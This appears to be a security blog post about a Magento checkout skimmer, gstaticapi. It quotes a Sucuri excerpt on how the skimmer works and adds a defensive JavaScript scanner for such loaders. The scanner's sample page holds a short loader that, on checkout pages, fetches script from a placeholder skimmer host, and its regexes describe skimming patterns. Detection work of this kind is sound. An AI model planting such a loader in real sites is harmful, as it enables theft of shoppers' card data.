Another Magento Credit Card Stealing Malware: gstaticapi

Magento is an open-source, PHP-based e-commerce CMS (Content Management System).

As of this writing, Magento has 194 listed CVEs (Common Vulnerabilities and Exposures).

That is very few compared to WordPress's 2,641 currently listed CVEs.

What does a low number of CVEs mean?

It means that, for the most part, Magento is pretty secure (mostly because it has far fewer plugins and themes available than CMSs like WordPress or Joomla).

That said, being built for e-commerce makes it a prime target when vulnerabilities are found and made public.

The most common hack we see on Magento sites is Credit Card theft.

Credit card theft is not something you want happening on your website.

It's of the utmost importance to keep your Magento installation up to date, stay aware of any security vulnerabilities that may exist, and get them fixed immediately.

Sucuri recently found another credit card swiper in the wild.


Article Excerpt: Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information.

To obtain sensitive details, the malware loads external JavaScript whenever the URL contains “checkout” — this location typically belongs to the step in Magento’s checkout process where users enter their sensitive credit card information and shipping details.

As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf.

Continue reading Magento Credit Card Stealing Malware: gstaticapi at Sucuri Blog.
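
A defender-side check for the pattern the excerpt describes (a URL test for "checkout" followed by loading external JavaScript), added here as an example and not code from Sucuri's write-up or this post. The regexes, the allowlisted host and the sample page are constructed assumptions.

```javascript
// Heuristic: flag inline scripts that (1) test the page URL for "checkout"
// and (2) inject a <script> element from a host outside an allowlist.
const ALLOWED_HOSTS = new Set(["js.payments.example"]); // hypothetical allowlist

const URL_GATES = [
  /location\s*\.\s*(?:href|pathname)\s*\.\s*(?:indexOf|includes|search|match)\s*\([^)]*checkout/i,
  /\/[^\/\n]*checkout[^\/\n]*\/[a-z]*\s*\.\s*test\s*\([^)]*location/i,
];
const LOADER = /createElement\s*\(\s*["']script["']\s*\)|\.getScript\s*\(/i;
const URL_LITERAL = /["'`](?:https?:)?\/\/([a-z0-9.-]+)/gi;

// Return the bodies of <script> tags that have no src attribute.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1]) && m[2].trim()) out.push(m[2]);
  }
  return out;
}

function scanScript(source) {
  const gated = URL_GATES.some((re) => re.test(source));
  const loads = LOADER.test(source);
  const hosts = [...source.matchAll(URL_LITERAL)].map((m) => m[1].toLowerCase());
  const unknownHosts = [...new Set(hosts)].filter((h) => !ALLOWED_HOSTS.has(h));
  return { gated, loads, unknownHosts, suspicious: gated && loads && unknownHosts.length > 0 };
}

function scanPage(html) {
  return inlineScripts(html).map(scanScript).filter((r) => r.suspicious);
}

// Constructed sample page (not the real malware): one benign script, one gated loader.
const SAMPLE_HTML = `
<script src="https://js.payments.example/v3.js"></script>
<script>var cartCount = 2; console.log(window.location.href);</script>
<script>
if (window.location.href.indexOf("checkout") > -1) {
  var s = document.createElement("script");
  s.src = "https://cdn.skimmer-placeholder.example/api.js";
  document.head.appendChild(s);
}
</script>`;

console.log(scanPage(SAMPLE_HTML));
```

A hit is a lead for manual review of the template or database block that emitted the script, not proof of compromise; obfuscated loaders will not match these patterns.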
